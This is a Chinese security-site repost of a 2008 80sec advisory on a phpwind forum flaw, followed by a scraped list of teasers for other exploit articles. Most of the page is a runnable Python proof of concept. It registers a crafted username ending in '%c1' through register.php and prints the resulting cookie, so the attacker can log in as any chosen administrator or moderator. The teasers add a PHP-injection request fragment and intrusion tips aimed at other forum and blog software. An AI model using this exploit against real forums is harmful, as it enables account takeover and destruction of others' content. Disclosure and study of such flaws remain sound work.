phpwind管理权限泄露漏洞利用程序发布_漏洞研究

漏洞发布:http://www.80sec.com/ 
漏洞作者:jianxin@80sec.com 
漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本 
漏洞危害:高 
漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作 

利用方式:http://www.80sec.com有提供exploit 
漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致在程序逻辑上判断有问题,用精心构造的数据注册用户即可获得管理权限 
漏洞修补:建议关闭注册功能等待官方出补丁 
漏洞状态: 
08.5.25发现此漏洞 
08.6.1由80sec.com公开此漏洞 

暂无补丁 

原始地址:http://www.80sec.com/release/phpwind-exploit.txt 

漏洞测试: 

复制代码 代码如下:

# -*- coding: gb2312 -*-  
import urllib2,httplib,sys  
httplib.HTTPConnection.debuglevel = 1  
cookies = urllib2.HTTPCookieProcessor()  
opener = urllib2.build_opener(cookies)   

def banner():  
    print ""  
    print "########################################################"  
    print "Phpwind所有版本管理权限泄露漏洞利用poc"  
    print "Copyright (C) 2006"  
    print "jianxin@80sec.com"  
    print "80sec是一个新的致力于web安全的小团体"  
    print "http://www.80sec.com"   

def usage():  
    banner()  
    print "Usage:\n"  
    print "   $ ./phpwind.py pwforumurl usertoattack\n"  
    print "   pwforumurl    目标论坛地址如http://www.80sec.com/"  
    print "   usertoattack    目标拥有权限的斑竹或管理员"  
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"  
    print "   最新版本可以使用uid登陆"  
    print "   其他版本可以使用cookie+useragent登陆"  
    print "########################################################"  
    print ""   

argvs=sys.argv  
usage()   

data = "regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2" % (argvs[2],”%c1″)  
pwurl = “%s/register.php” % argvs[1]   

request = urllib2.Request(  
    url     = pwurl ,  
        headers = {'Content-Type' : ‘application/x-www-form-urlencoded','User-Agent': '80sec owned this'},  
        data    = data)   

f=opener.open(request)  
headers=f.headers.dict  
cookie=headers["set-cookie"]  
try:  
    if cookie.index('winduser'):  
        print “Exploit Success!”  
        print “Login with uid password @80sec or Cookie:”  
        print cookie  
        print “User-agent: 80sec owned this”  
except:  
    print “Error! http://www.80sec.com”  
    print “Connect root#80sec.com”

时间: 2025-01-02 10:35:46

phpwind管理权限泄露漏洞利用程序发布_漏洞研究的相关文章

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范_漏洞研究

一.概述    漏洞介绍: http://coolersky.com/leak/programme/bbs/2006/0515/515.html     前几天就听Hak_Ban说有人把dvbbs7的一个注入漏洞给发布出去了,一直也没时间看看,下午跟Edward要了个链接看了看: http://www.eviloctal.com/forum/read.php?tid=22074     本站转贴为: http://coolersky.com/articles/hack/analysis/prog

四大漏洞入侵博客_漏洞研究

博客入侵太简单了!大家要注意啊!  漏洞一:数据库下载漏洞  第一步,搜索攻击目标  打开搜索引擎,搜索"Pragram by Dlog",可以找到许多博客页面,这些博客都是使用"Dlog破废墟修改版"建立的.我们要找的叶面是存在暴库漏洞的1.2版本.许多用户都忽视了这个版本中内嵌的eWebEditor在线编辑数据库的安全性,致使黑客可以使用默认的路径进行下载.  第二步,获取管理员密码  在搜索结果列表中挑一个攻击目标:http://s*.8888.com/blo

经典漏洞ms04011的必杀技_漏洞研究

受影响系统: Microsoft Windows XP Microsoft Windows NT 4.0 Microsoft Windows 2000 描述: Microsoft Windows Winlogon存在进程一个缓冲区溢出,远程攻击者可以利用这个漏洞可能以进程权限执行任意指令. 由于Winlogon在登录过程中使用的数据值大小没有进行任何检查就插入到分配的缓冲区中,可导致发生缓冲区溢出,精心构建提交数据可能以进程权限在系统上执行任意指令. 1 用ms04011漏洞扫描器扫出有漏洞的主

Serv-U本地权限提升的ASP版实现_漏洞研究

网上流传可以利用MSWinsock控件实现,这是不好滴.因为这是个第三方组件,呵呵,几率相当小,既然要杀人灭口,嘿嘿,肯定要采用一套通杀的方法才是. Serv-U服务器管理那里使用了FTP协议,所以我们应该研究一下FTP协议先. 正常的FTP协议的认证过程:  220 Serv-U FTP Server v5.2 for WinSock ready... user lake2 331 User name okay, need password. pass lake2lake2 230 User 

动网dvbbs7.1论坛权限提升漏洞及防范(图)_漏洞研究

在6月份的黑防上看到<动网7.1漏洞惊现江湖>一文说是admin_postings.asp文件 存在注入漏洞但利用的前提是拥有超级斑竹或前台管理员权限.我想起以前发现的动网7.x版本存在一个前台权限提升漏洞 正好可以结合起来利用.这个前台权限提升漏洞对7.x的Access和 Sql版都有效.下面我们就以7.0 sp2 sql版讲解这个漏洞的利用. 漏洞分析 我们知道动网是通过GroupID来判断当前用户所在的组的然后再通过组的信息判断用户的权限.它是如何取得这个GroupID的呢让我们看看登录

针对ACCESS漏洞又一发现_漏洞研究

如今SQL injection可谓是火爆,诸多新的Injection方式被挖掘出来.利用系统错误来爆路径,更是热门话题,今天我也凑个热闹.   本例测试适用于ACCESS(由于MS SQL查询不存在指定路径),ACEESS存在一个可以把源数据库的表导入到目标数据库中.   如: mysource.mdb(admin表) -〉mydestion.mdb中   如果要在一个已经存在的外部数据库里创建新的工作表,你可以用IN关键字.如果外部数据库不存在或是数据表已存在的话,SELECT INTO 语句

Ofsatr 2.6搜索漏洞的简单分析_漏洞研究

看到网上有类似的工具,但分析的文章却没找到,听小黑说黑客手册上有,可惜偶没有杂志,所以就抓包然后看下代码,大致分析了一下.这个漏洞很巧妙.也很经典 :)    GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=〈?fputs(fop   en(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(98).c

94% 的微软高危漏洞可通过关闭管理权限消除

端点安全公司 Avecto 发布了2016 年度微软漏洞报告,今年的报告有以下亮点: 总体来说,2016年报告了530个Microsoft漏洞,其中36%(189)为高危漏洞.在这些高危漏洞中,94%可通过关闭管理权限消除. 尽管Windows 10是微软最新和"最安全"的操作系统,但却比其他任何操作系统(395)的漏洞比例都高,比Windows 8和Windows 8.1(均为265个)多46%. Avecto的报告发现,93% 的 Windows 10 漏洞可通过关闭管理权限消除.

无Sockets的远程溢出漏洞利用方法

本文讲的是无Sockets的远程溢出漏洞利用方法,在本文中,我将介绍一种在一个易受攻击的远程机器上获得shell访问的简单技术(这仅仅是我个人的观点).这不是我自己创造的技术,但我发现它很有趣.所以,本文的重点是这种技术本身,而不是利用漏洞的方式. 设置你的环境 所以,为了专注于制作远程shellcode,而不是如何规避ASLR,不可执行堆栈等(这将需要大量的篇幅进行介绍),我们将在测试中禁用大多数类似的功能.一旦你准备好了shellcode,便可以重新启用ASLR保护并尝试再次进行程序的漏洞利